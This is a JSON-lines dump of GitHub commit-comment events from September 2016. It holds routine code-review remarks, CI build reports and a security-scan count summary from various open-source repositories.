{"id":"4600635640","type":"CommitCommentEvent","actor":{"login":"kalturaguy"},"repo":{"name":"kaltura/liveDVR"},"payload":{"comment":{"id":19125437,"position":50,"line":201,"path":"lib/playlistGenerator/MixFilterClip.js","commit_id":"211e924aa5cfba00f4a27dba6abdf053cf33ce2a","created_at":"2016-09-22T06:28:48Z","updated_at":"2016-09-22T06:28:48Z","body":"(videoPts!==null  && audioPts!==null )"}},"created_at":"2016-09-22T06:28:48Z"}
{"id":"4600635997","type":"CommitCommentEvent","actor":{"login":"CristianLema"},"repo":{"name":"CristianLema/tendaOnline"},"payload":{"comment":{"id":19125440,"position":null,"line":null,"path":null,"commit_id":"dd363f081e9108129ec53119b650e97b7310483d","created_at":"2016-09-22T06:28:56Z","updated_at":"2016-09-22T06:28:56Z","body":"@serlesen con evitar tags refíreste a que evite a clase _MenuTag.java_? De mellor facer un template para cada menú (cada tipo de usuario ten un menú), e inserte un menú ou outro en cada jsp? Estilo:\r\n`<%@ include file='/menuAdmin.html'%>`\r\n\r\nEu fixen así porque agora podo facer nos seguintes jsps:\r\n`<temp:plantillas title=\"Inicio - Registrarse\" type=\"${session.user.getUser_tipo }\" pos=\"index\">`\r\n"}},"created_at":"2016-09-22T06:28:56Z"}
{"id":"4600640516","type":"CommitCommentEvent","actor":{"login":"stephanemagnenat"},"repo":{"name":"aseba-community/dashel"},"payload":{"comment":{"id":19125456,"position":13,"line":583,"path":"dashel/dashel-posix.cpp","commit_id":"474435c132694c5ca4d546d8e28fd79220e83106","created_at":"2016-09-22T06:30:31Z","updated_at":"2016-09-22T06:30:31Z","body":"I am wondering whether this logic should go directly into `SelectableStream` because it is the class holding the `fd`. I am not sure because because the interpretation of the content of `target` is the responsibility of the subclasses."}},"created_at":"2016-09-22T06:30:31Z"}
{"id":"4600641117","type":"CommitCommentEvent","actor":{"login":"froden"},"repo":{"name":"difi/felles-utility-dotnet"},"payload":{"comment":{"id":19125458,"position":24,"line":39,"path":"Difi.Felles.Utility/CertificateChainValidator.cs","commit_id":"4363acc025e1f7cbcb4a38e80fb2df7d4c503588","created_at":"2016-09-22T06:30:43Z","updated_at":"2016-09-22T06:30:43Z","body":"Gå for chainsStatus i stedet for kjedestatus her også? Siden du har gått over til engelsk?"}},"created_at":"2016-09-22T06:30:43Z"}
{"id":"4600643443","type":"CommitCommentEvent","actor":{"login":"lcyyork"},"repo":{"name":"evangelistalab/forte"},"payload":{"comment":{"id":19125461,"position":null,"line":null,"path":null,"commit_id":"c5b458c9d7098c1a19261cb11bf0f9eed8db4405","created_at":"2016-09-22T06:31:30Z","updated_at":"2016-09-22T06:31:30Z","body":"Not sure, this is a fix when doing triplet. I can try doublet tomorrow. You can always put another hydrogen atom at infinite distance with a minimal basis to balance the system to singlet, triplet, quintet..."}},"created_at":"2016-09-22T06:31:30Z"}
{"id":"4600649381","type":"CommitCommentEvent","actor":{"login":"onli"},"repo":{"name":"s9y/Serendipity"},"payload":{"comment":{"id":19125475,"position":null,"line":null,"path":null,"commit_id":"177044c9419870de61ef0a7a2651083b9355aaab","created_at":"2016-09-22T06:33:40Z","updated_at":"2016-09-22T06:33:40Z","body":"Thanks @yellowled "}},"created_at":"2016-09-22T06:33:40Z"}
{"id":"4600649676","type":"CommitCommentEvent","actor":{"login":"gadyaari"},"repo":{"name":"kaltura/liveDVR"},"payload":{"comment":{"id":19125478,"position":6,"line":34,"path":"common/config/config.json.template","commit_id":"211e924aa5cfba00f4a27dba6abdf053cf33ce2a","created_at":"2016-09-22T06:33:47Z","updated_at":"2016-09-22T06:33:47Z","body":"From what I saw in the dashboard the pts difference is in seconds, no?\r\nIs it ok to chase the window value to sec as well?"}},"created_at":"2016-09-22T06:33:47Z"}
{"id":"4600650067","type":"CommitCommentEvent","actor":{"login":"devenbansod"},"repo":{"name":"phpmyadmin/phpmyadmin"},"payload":{"comment":{"id":19125481,"position":null,"line":null,"path":null,"commit_id":"adcaf7ca4b74ec89c7cb86274c70fa4327f79d1c","created_at":"2016-09-22T06:33:56Z","updated_at":"2016-09-22T06:33:56Z","body":"Oh. I did not realize this. I had originally meant to use it in both the cases. \r\n\r\nI have now made a PR #12578 to fix this error. Could you please take a look (once the tests are completed) if it makes sense ?"}},"created_at":"2016-09-22T06:33:56Z"}
{"id":"4600652799","type":"CommitCommentEvent","actor":{"login":"gadyaari"},"repo":{"name":"kaltura/liveDVR"},"payload":{"comment":{"id":19125487,"position":50,"line":201,"path":"lib/playlistGenerator/MixFilterClip.js","commit_id":"211e924aa5cfba00f4a27dba6abdf053cf33ce2a","created_at":"2016-09-22T06:34:52Z","updated_at":"2016-09-22T06:34:52Z","body":"done\r\n"}},"created_at":"2016-09-22T06:34:52Z"}
{"id":"4600652985","type":"CommitCommentEvent","actor":{"login":"gadyaari"},"repo":{"name":"kaltura/liveDVR"},"payload":{"comment":{"id":19125489,"position":15,"line":115,"path":"lib/playlistGenerator/MixFilterClip.js","commit_id":"211e924aa5cfba00f4a27dba6abdf053cf33ce2a","created_at":"2016-09-22T06:34:56Z","updated_at":"2016-09-22T06:34:56Z","body":"done"}},"created_at":"2016-09-22T06:34:56Z"}
{"id":"4600654288","type":"CommitCommentEvent","actor":{"login":"gadyaari"},"repo":{"name":"kaltura/liveDVR"},"payload":{"comment":{"id":19125494,"position":152,"line":389,"path":"lib/entry/FlavorDownloader.js","commit_id":"211e924aa5cfba00f4a27dba6abdf053cf33ce2a","created_at":"2016-09-22T06:35:22Z","updated_at":"2016-09-22T06:35:22Z","body":"Thought it would be easier for parsing afterwards"}},"created_at":"2016-09-22T06:35:22Z"}
{"id":"4600655560","type":"CommitCommentEvent","actor":{"login":"benjycui"},"repo":{"name":"ant-design/ant-design"},"payload":{"comment":{"id":19125497,"position":43,"line":139,"path":"components/table/filterDropdown.tsx","commit_id":"a25ec29fb8de6d1cdf1801278c3c8721eb74140b","created_at":"2016-09-22T06:35:47Z","updated_at":"2016-09-22T06:35:47Z","body":"没有把 prefixCls 传下去。。 https://github.com/ant-design/ant-design/issues/3119"}},"created_at":"2016-09-22T06:35:47Z"}
{"id":"4600669915","type":"CommitCommentEvent","actor":{"login":"zreigz"},"repo":{"name":"zreigz/kubernetes"},"payload":{"comment":{"id":19125520,"position":21,"line":199,"path":"pkg/kubectl/configmap.go","commit_id":"bb7d16f486d6a928ea3707196897f33e863f9c96","created_at":"2016-09-22T06:40:36Z","updated_at":"2016-09-22T06:40:36Z","body":"Yes I agree. In this case the `utf8.Valid` is a good approach "}},"created_at":"2016-09-22T06:40:36Z"}
{"id":"4600670599","type":"CommitCommentEvent","actor":{"login":"joergoster"},"repo":{"name":"joergoster/Stockfish"},"payload":{"comment":{"id":19125524,"position":null,"line":null,"path":null,"commit_id":"90e6015e93112a2fd209d92728ba7fb13d40a7d4","created_at":"2016-09-22T06:40:50Z","updated_at":"2016-09-22T06:40:50Z","body":"@hxim Ouch, you're right. Thanks for reminding me. Assert still gets triggered on the mentioned position."}},"created_at":"2016-09-22T06:40:50Z"}
{"id":"4600672179","type":"CommitCommentEvent","actor":{"login":"ihpdep"},"repo":{"name":"votchallenge/vot-toolkit"},"payload":{"comment":{"id":19125527,"position":null,"line":null,"path":null,"commit_id":"75238a99b371b8911d46cde9dde4a92a8e42d919","created_at":"2016-09-22T06:41:22Z","updated_at":"2016-09-22T06:41:22Z","body":"It seems the md5sum function is not included in the commit"}},"created_at":"2016-09-22T06:41:22Z"}
{"id":"4600673568","type":"CommitCommentEvent","actor":{"login":"estitt"},"repo":{"name":"tekezo/Karabiner-Elements"},"payload":{"comment":{"id":19125532,"position":null,"line":null,"path":null,"commit_id":"85a0bd1b75ca8c94ccd17403185ca1c01e8c656e","created_at":"2016-09-22T06:41:50Z","updated_at":"2016-09-22T06:41:50Z","body":"Here is how I mapped a numeric keypad:\r\n{\r\n    \"profiles\": [\r\n        {\r\n            \"name\": \"Default profile\",\r\n            \"selected\": true,\r\n            \"simple_modifications\": {\r\n                \"keypad_1\": \"end\",\r\n                \"keypad_2\": \"down_arrow\",\r\n                \"keypad_3\": \"page_down\",\r\n                \"keypad_4\": \"left_arrow\",\r\n                \"keypad_5\": \"delete_forward\",\r\n                \"keypad_6\": \"right_arrow\",\r\n                \"keypad_7\": \"home\",\r\n                \"keypad_8\": \"up_arrow\",\r\n                \"keypad_9\": \"page_up\",\r\n                \"keypad_0\": \"insert\",\r\n                \"keypad_period\": \"delete_forward\",\r\n                \"keypad_enter\": \"enter\",\r\n                \"keypad_plus\": \"+\",\r\n                \"keypad_slash\": \"/\",\r\n                \"keypad_numlock\": \"escape\",\r\n                \"keypad_asterisk\": \"*\",\r\n                \"keypad_hyphen\": \"-\"\r\n            }\r\n        }\r\n    ]\r\n}\r\n\r\n\r\nFor reference, here is the list of keys I found:\r\nagain\r\nalternate_erase\r\napplication\r\nbackslash\r\ncancel\r\ncaps_lock\r\nclear\r\nclear_or_again\r\nclose_bracket\r\ncomma\r\ncopy\r\ncr_sel_or_props\r\ncut\r\ndelete_forward\r\ndelete_or_backspace\r\ndown_arrow\r\nend\r\nequal_sign\r\nescape\r\nex_sel\r\nexecute\r\nf1\r\nf10\r\nf11\r\nf12\r\nf13\r\nf14\r\nf15\r\nf16\r\nf17\r\nf18\r\nf19\r\nf2\r\nf20\r\nf21\r\nf22\r\nf23\r\nf24\r\nf3\r\nf4\r\nf5\r\nf6\r\nf7\r\nf8\r\nf9\r\nfind\r\nfn\r\ngrave_accent_and_tilde\r\nhelp\r\nhome\r\nhyphen\r\ninsert\r\ninternational1\r\ninternational2\r\ninternational3\r\ninternational4\r\ninternational5\r\ninternational6\r\ninternational7\r\ninternational8\r\ninternational9\r\njapanese_eisuu\r\njapanese_kana\r\njapanese_pc_katakana\r\njapanese_pc_nfer\r\njapanese_pc_xfer\r\nkeypad_0\r\nkeypad_1\r\nkeypad_2\r\nkeypad_3\r\nkeypad_4\r\nkeypad_5\r\nkeypad_6\r\nkeypad_7\r\nkeypad_8\r\nkeypad_9\r\nkeypad_asterisk\r\nkeypad_comma\r\nkeypad_enter\r\nkeypad_equal_sign\r\nkeypad_equal_sign_as400\r\nkeypad_hyphen\r\nkeypad_num_lock\r\nkeypad_period\r\nkeypad_plus\r\nkeypad_slash\r\nlang1\r\nlang2\r\nlang3\r\nlang4\r\nlang5\r\nlang6\r\nlang7\r\nlang8\r\nlang9\r\nleft_alt\r\nleft_arrow\r\nleft_command\r\nleft_control\r\nleft_gui\r\nleft_option\r\nleft_shift\r\nlocking_caps_lock\r\nlocking_num_lock\r\nlocking_scroll_lock\r\nmenu\r\nmute\r\nnon_us_backslash\r\nnon_us_pound\r\nopen_bracket\r\noper\r\nout\r\npage_down\r\npage_up\r\npaste\r\npause\r\nperiod\r\npower\r\nprint_screen\r\nprior\r\nquote\r\nreturn\r\nreturn_or_enter\r\nright_alt\r\nright_arrow\r\nright_command\r\nright_control\r\nright_gui\r\nright_option\r\nright_shift\r\nscroll_lock\r\nselect\r\nsemicolon\r\nseparator\r\nslash\r\nspacebar\r\nstop\r\nsys_req_or_attention\r\ntab\r\nundo\r\nup_arrow\r\nvk_consumer_brightness_down\r\nvk_consumer_brightness_up\r\nvk_consumer_illumination_down\r\nvk_consumer_illumination_up\r\nvk_consumer_next\r\nvk_consumer_play\r\nvk_consumer_previous\r\nvk_dashboard\r\nvk_launchpad\r\nvk_mission_control\r\nvolume_down\r\nvolume_up"}},"created_at":"2016-09-22T06:41:50Z"}
{"id":"4600678699","type":"CommitCommentEvent","actor":{"login":"be1yae8"},"repo":{"name":"be1yae8/test"},"payload":{"comment":{"id":19125547,"position":null,"line":null,"path":null,"commit_id":"3ff61c3d93e8032466c06482f8ad8b7a09b9a919","created_at":"2016-09-22T06:43:37Z","updated_at":"2016-09-22T06:43:37Z","body":"This is test reposetory"}},"created_at":"2016-09-22T06:43:37Z"}
{"id":"4600679542","type":"CommitCommentEvent","actor":{"login":"mybad87"},"repo":{"name":"icecreamassassin/OdysseyAct1"},"payload":{"comment":{"id":19125548,"position":null,"line":null,"path":null,"commit_id":"8113fd15843bed578fc7bf035d765fdf04b64000","created_at":"2016-09-22T06:43:54Z","updated_at":"2016-09-22T06:43:54Z","body":"just built a new model for unique direnni watchtowers scattered around the island, trying to texturepaint a bit because they look too flat for my tastes, about the noise I really dont know where it may come from, maybe it was just dropped down by mistake!"}},"created_at":"2016-09-22T06:43:54Z"}
{"id":"4600681347","type":"CommitCommentEvent","actor":{"login":"pb00068"},"repo":{"name":"joergoster/Stockfish"},"payload":{"comment":{"id":19125551,"position":null,"line":null,"path":null,"commit_id":"90e6015e93112a2fd209d92728ba7fb13d40a7d4","created_at":"2016-09-22T06:44:31Z","updated_at":"2016-09-22T06:44:31Z","body":"@joergoster the assertion -VALUE_INFINITE <= alpha && alpha < beta && beta <= VALUE_INFINITE'\r\nis rather complex with 3 terms. Which one of them is failing actually on the mentioned position?"}},"created_at":"2016-09-22T06:44:31Z"}
{"id":"4600681844","type":"CommitCommentEvent","actor":{"login":"ThomasGire"},"repo":{"name":"EdisonLorgues1SD1617/Math1SD1617"},"payload":{"comment":{"id":19125554,"position":null,"line":null,"path":null,"commit_id":"84103ca475016576f88c88217b6fd6224d374d12","created_at":"2016-09-22T06:44:42Z","updated_at":"2016-09-22T06:44:42Z","body":"Tu peux poster cela plutôt sur le fil du devoir ici : https://github.com/EdisonLorgues1SD1617/Devoirs/issues/9\r\n\r\nExprimer qu'un point M(x,y) appartienne à P1 et P2 se traduit par le fait que ses coordonnées (x;y) vérifient le système des deux équations (de P1 et de P2)"}},"created_at":"2016-09-22T06:44:42Z"}
{"id":"4600685304","type":"CommitCommentEvent","actor":{"login":"psycofdj"},"repo":{"name":"psycofdj/xtdcpp"},"payload":{"comment":{"id":19125561,"position":null,"line":null,"path":null,"commit_id":"c58815bd2eafa7239d4d1ecf9914095871124be5","created_at":"2016-09-22T06:45:52Z","updated_at":"2016-09-22T06:45:52Z","body":"\nBuild report #161831447 for sha c58815bd2eafa7239d4d1ecf9914095871124be5:\n\n[![UnitTests](https://img.shields.io/badge/unittests-passed%20%283/3%29%20-brightgreen.svg)](#)\n[![Coverage](https://img.shields.io/badge/coverage-14.06%20%25-yellow.svg)](#)\n[![Cppcheck](https://img.shields.io/badge/cppcheck-0%20error%28s%29-brightgreen.svg)](#)\n[![Code statistics](https://img.shields.io/badge/cloc-3047%20/%209965%20%2830.58%20%25%29-yellow.svg)](#)\n[![Documentation](https://img.shields.io/badge/doc-success-brightgreen.svg)](#)\n[![Documentation coverage](https://img.shields.io/badge/doc--coverage-25.38%20%25-yellow.svg)](#)\n\n\n[Reports](https://psycofdj.github.io/xtdcpp/more_documentation/)\n      "}},"created_at":"2016-09-22T06:45:52Z"}
{"id":"4600688103","type":"CommitCommentEvent","actor":{"login":"Sebobo"},"repo":{"name":"dgrammlich/Surf"},"payload":{"comment":{"id":19125568,"position":14,"line":13,"path":"composer.json","commit_id":"aea012a94bab90ebf57581dc54b0f6cd8157bb31","created_at":"2016-09-22T06:46:47Z","updated_at":"2016-09-22T06:46:47Z","body":"This should go to require-dev because it's not needed for actual usage and the phar."}},"created_at":"2016-09-22T06:46:47Z"}
{"id":"4600690337","type":"CommitCommentEvent","actor":{"login":"alxndrsn"},"repo":{"name":"medic/medic-webapp"},"payload":{"comment":{"id":19125571,"position":5,"line":335,"path":"tests/karma/unit/services/generate-search-requests.js","commit_id":"19e5245935859a4094a4b8c88a393de96d6714c8","created_at":"2016-09-22T06:47:29Z","updated_at":"2016-09-22T06:47:29Z","body":"Not 100% convinced by this test name - surely the whitespace is is important, but is not included as a search term?"}},"created_at":"2016-09-22T06:47:29Z"}
{"id":"4600690947","type":"CommitCommentEvent","actor":{"login":"Lipatnikov"},"repo":{"name":"Lipatnikov/hello-world2"},"payload":{"comment":{"id":19125573,"position":2,"line":2,"path":"code.c","commit_id":"6cf79bbf5cecccd38c28305877870e1225813745","created_at":"2016-09-22T06:47:40Z","updated_at":"2016-09-22T06:47:40Z","body":"I disagree"}},"created_at":"2016-09-22T06:47:40Z"}
{"id":"4600692090","type":"CommitCommentEvent","actor":{"login":"Lipatnikov"},"repo":{"name":"Lipatnikov/hello-world2"},"payload":{"comment":{"id":19125577,"position":2,"line":2,"path":"code.c","commit_id":"6cf79bbf5cecccd38c28305877870e1225813745","created_at":"2016-09-22T06:48:04Z","updated_at":"2016-09-22T06:48:04Z","body":"No, that was needed"}},"created_at":"2016-09-22T06:48:04Z"}
{"id":"4600694676","type":"CommitCommentEvent","actor":{"login":"asjafjell"},"repo":{"name":"difi/felles-utility-dotnet"},"payload":{"comment":{"id":19125582,"position":24,"line":39,"path":"Difi.Felles.Utility/CertificateChainValidator.cs","commit_id":"4363acc025e1f7cbcb4a38e80fb2df7d4c503588","created_at":"2016-09-22T06:48:54Z","updated_at":"2016-09-22T06:48:54Z","body":"Prøver oss på å holde det norsk utad, fordi det er kravet til Difi. Her var jeg litt tvil fordi dette er jo et bibliotek brukt av bibliotekene, så sånn sett kan vi jo gjøre de engelsk, men da vil jeg ta `public`-metodene også. Det vil føre til brekkende forandringer :) "}},"created_at":"2016-09-22T06:48:54Z"}
{"id":"4600696310","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19125586,"position":null,"line":null,"path":null,"commit_id":"831b1e5a2e296c4e42c98efbf38ed8d5e17af8f1","created_at":"2016-09-22T06:49:28Z","updated_at":"2016-09-22T06:49:28Z","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1768 of 1768 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-831b1e5a2e296c4e42c98efbf38ed8d5e17af8f1-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-831b1e5a2e296c4e42c98efbf38ed8d5e17af8f1-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-831b1e5a2e296c4e42c98efbf38ed8d5e17af8f1-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.14%25-green.svg)</a>\n"}},"created_at":"2016-09-22T06:49:28Z"}
{"id":"4600696727","type":"CommitCommentEvent","actor":{"login":"dalexj"},"repo":{"name":"Ameobea/Calculator-Programs"},"payload":{"comment":{"id":19125588,"position":null,"line":null,"path":null,"commit_id":"c89d288d9405088be3fc37842bdae7a68b408601","created_at":"2016-09-22T06:49:37Z","updated_at":"2016-09-22T06:49:37Z","body":"please verify this commit"}},"created_at":"2016-09-22T06:49:37Z"}
{"id":"4600697476","type":"CommitCommentEvent","actor":{"login":"froden"},"repo":{"name":"difi/felles-utility-dotnet"},"payload":{"comment":{"id":19125590,"position":24,"line":39,"path":"Difi.Felles.Utility/CertificateChainValidator.cs","commit_id":"4363acc025e1f7cbcb4a38e80fb2df7d4c503588","created_at":"2016-09-22T06:49:52Z","updated_at":"2016-09-22T06:49:52Z","body":"Aha, da skjønner jeg! 👍 "}},"created_at":"2016-09-22T06:49:52Z"}
{"id":"4600698107","type":"CommitCommentEvent","actor":{"login":"operezfuentes"},"repo":{"name":"skomis-mm/serilog-sinks-periodicbatching"},"payload":{"comment":{"id":19125592,"position":null,"line":null,"path":null,"commit_id":"b4c60d63d3fe0889e4a973ed40ca8c4f4729024e","created_at":"2016-09-22T06:50:04Z","updated_at":"2016-09-22T06:50:04Z","body":"Nice work @skomis-mm, really we need a queueLimit option in Serilog.\r\nWhen do you preview to PR to serilog/serilog-sinks-periodicbatching?\r\n\r\nThanks!\r\n"}},"created_at":"2016-09-22T06:50:04Z"}
{"id":"4600698792","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19125593,"position":null,"line":null,"path":null,"commit_id":"831b1e5a2e296c4e42c98efbf38ed8d5e17af8f1","created_at":"2016-09-22T06:50:18Z","updated_at":"2016-09-22T06:50:18Z","body":"develop (mjwitte) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-831b1e5a2e296c4e42c98efbf38ed8d5e17af8f1-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-22T06:50:18Z"}
{"id":"4600700259","type":"CommitCommentEvent","actor":{"login":"dortal"},"repo":{"name":"dortal/bookstorephp4_9810_lines"},"payload":{"comment":{"id":19125598,"position":null,"line":null,"path":null,"commit_id":"0570c40a005c1f336b1ba9028ce97864606300af","created_at":"2016-09-22T06:50:45Z","updated_at":"2016-09-22T06:50:45Z","body":"Checkmarx scan results 22 Sep 2016 09:46 UTC +03:00\r\n<table>\r\n<thead>\r\n<tr>\r\n<th></th>\r\n<th>High</th>\r\n<th>Medium</th>\r\n<th>Low</th>\r\n<th>Info</th>\r\n</tr>\r\n</thead>\r\n<tbody>\r\n<tr>\r\n<td><b>New</b></td>\r\n<td align=\"center\">2</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n</tr>\r\n<tr>\r\n<td><b>Recurrent</b></td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n</tr>\r\n<tr>\r\n<td><b>Fixed</b></td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n<td align=\"center\">0</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<a href= \"http://ARONY-PC/CxWebClient/ViewerMain.aspx?scanid=1000000&projectid=2\"> Open Viewer</a>\r\n<b>Included commits</b><table><tr><th>Commit ID</th><th>Owner</th></tr><tr><td><a href=\"https://github.com/dortal/bookstorephp4_9810_lines/commit/0570c40a005c1f336b1ba9028ce97864606300af\">0570c40a005c1f336b1ba9028ce97864606300af</a></td><td>@web-flow</td></tr></table>\r\n"}},"created_at":"2016-09-22T06:50:45Z"}
{"id":"4600700811","type":"CommitCommentEvent","actor":{"login":"Lipatnikov"},"repo":{"name":"Lipatnikov/hello-world2"},"payload":{"comment":{"id":19125600,"position":null,"line":null,"path":null,"commit_id":"6cf79bbf5cecccd38c28305877870e1225813745","created_at":"2016-09-22T06:50:56Z","updated_at":"2016-09-22T06:50:56Z","body":"It seems like the commit is appropriate"}},"created_at":"2016-09-22T06:50:56Z"}
{"id":"4600700991","type":"CommitCommentEvent","actor":{"login":"150balbes"},"repo":{"name":"150balbes/lib"},"payload":{"comment":{"id":19125601,"position":null,"line":null,"path":null,"commit_id":"c9c653a4d742fcbfdbcf5f7a4a59360bc97d3297","created_at":"2016-09-22T06:51:00Z","updated_at":"2016-09-22T06:51:00Z","body":"Хотел проверить предложенный вариант на железках S905 под Wheezy, но получил ошибку при попытке собрки образа Wheezy для S905, на этапе формирования Debootstrap . Возможно ошибаюсь, но насколько  понял ошибку, не может получить пакеты, не находит нужных реп для wheezy и архитерктуры arm64. Думал, что ошибка в моём gite. Проверил на чистом клоне с Вашего, запускал сборку для Odroid C2 (S905) и выбирал создать проект Wheezy. Результат тот же. "}},"created_at":"2016-09-22T06:51:00Z"}
{"id":"4600701285","type":"CommitCommentEvent","actor":{"login":"Lipatnikov"},"repo":{"name":"Lipatnikov/hello-world2"},"payload":{"comment":{"id":19125602,"position":null,"line":null,"path":null,"commit_id":"6cf79bbf5cecccd38c28305877870e1225813745","created_at":"2016-09-22T06:51:06Z","updated_at":"2016-09-22T06:51:06Z","body":"I also agree!"}},"created_at":"2016-09-22T06:51:06Z"}
{"id":"4600704757","type":"CommitCommentEvent","actor":{"login":"henrik"},"repo":{"name":"barsoom/barsoom_utils"},"payload":{"comment":{"id":19125607,"position":null,"line":null,"path":null,"commit_id":"f1be051d674e1ea41ff24241a037cfa1b6e97f0a","created_at":"2016-09-22T06:52:18Z","updated_at":"2016-09-22T06:52:18Z","body":"Nice. While you have this project fresh on your machines, you could consider renaming it away from \"Barsoom\" :)"}},"created_at":"2016-09-22T06:52:18Z"}
{"id":"4600707196","type":"CommitCommentEvent","actor":{"login":"NeatSketch"},"repo":{"name":"NeatSketch/tabun"},"payload":{"comment":{"id":19125610,"position":82,"line":92,"path":"classes/modules/blog/entity/BlogUser.entity.class.php","commit_id":"eec5763ea1a9fea84e748e4f793bad1786c56205","created_at":"2016-09-22T06:53:07Z","updated_at":"2016-09-22T06:53:07Z","body":"да, косяк, забыл поменять"}},"created_at":"2016-09-22T06:53:07Z"}
{"id":"4600709781","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19125616,"position":null,"line":null,"path":null,"commit_id":"3282e244d53fca3da36869bd607acb99911907e2","created_at":"2016-09-22T06:53:58Z","updated_at":"2016-09-22T06:53:58Z","body":"113836013-Swimming-Pool-Evaporation-and-Cover-Issues (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug: OK (1769 of 1769 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3282e244d53fca3da36869bd607acb99911907e2-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3282e244d53fca3da36869bd607acb99911907e2-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3282e244d53fca3da36869bd607acb99911907e2-x86_64-Linux-Ubuntu-14.04-gcc-4.8-IntegrationCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-71.14%25-green.svg)</a>\n"}},"created_at":"2016-09-22T06:53:58Z"}
{"id":"4600710041","type":"CommitCommentEvent","actor":{"login":"joergoster"},"repo":{"name":"joergoster/Stockfish"},"payload":{"comment":{"id":19125617,"position":null,"line":null,"path":null,"commit_id":"90e6015e93112a2fd209d92728ba7fb13d40a7d4","created_at":"2016-09-22T06:54:04Z","updated_at":"2016-09-22T06:54:04Z","body":"@pb00068 Separating the assert into 3 single one:\r\n```\r\nstockfish: search.cpp:552: Value {anonymous}::search(Position&, Search::Stack*, Value, Value, Depth, bool) [with {anonymous}::NodeType NT = (<unnamed>::NodeType)0u]: Assertion `-VALUE_INFINITE <= alpha' failed.\r\n```\r\n"}},"created_at":"2016-09-22T06:54:04Z"}
{"id":"4600710354","type":"CommitCommentEvent","actor":{"login":"testtcs111"},"repo":{"name":"litesuits/android-common"},"payload":{"comment":{"id":19125620,"position":9,"line":9,"path":"AndroidManifest.xml","commit_id":"1f46a0c3f84211dac3bed0139fdf530052872931","created_at":"2016-09-22T06:54:10Z","updated_at":"2016-09-22T06:54:10Z","body":"dfhgfjhdgjgfjghjf"}},"created_at":"2016-09-22T06:54:10Z"}
{"id":"4600712333","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19125623,"position":null,"line":null,"path":null,"commit_id":"3282e244d53fca3da36869bd607acb99911907e2","created_at":"2016-09-22T06:54:48Z","updated_at":"2016-09-22T06:54:48Z","body":"113836013-Swimming-Pool-Evaporation-and-Cover-Issues (mjwitte) - x86_64-Linux-Ubuntu-14.04-custom_check: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-3282e244d53fca3da36869bd607acb99911907e2-x86_64-Linux-Ubuntu-14.04-custom_check.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a>  \n"}},"created_at":"2016-09-22T06:54:48Z"}
{"id":"4600712646","type":"CommitCommentEvent","actor":{"login":"DeadneM"},"repo":{"name":"APOPHIS9283/Singularity"},"payload":{"comment":{"id":19125624,"position":null,"line":null,"path":null,"commit_id":"58d838da8663e6ebd881858e950079f72eb72b03","created_at":"2016-09-22T06:54:55Z","updated_at":"2016-09-22T06:54:55Z","body":"Why ? you don't use zram anymore ?"}},"created_at":"2016-09-22T06:54:55Z"}
{"id":"4600713227","type":"CommitCommentEvent","actor":{"login":"pingan1927"},"repo":{"name":"ant-design/ant-design-mobile"},"payload":{"comment":{"id":19125626,"position":null,"line":null,"path":null,"commit_id":"127d981ca6b9caeffdb476709f9897a7e17af30e","created_at":"2016-09-22T06:55:07Z","updated_at":"2016-09-22T06:55:07Z","body":"点击清除icon的时候，inputItem会立即触发`blur`事件，`focus`立马变为false，icon就消失，也就触发不了清除内容这个行为。so~"}},"created_at":"2016-09-22T06:55:07Z"}
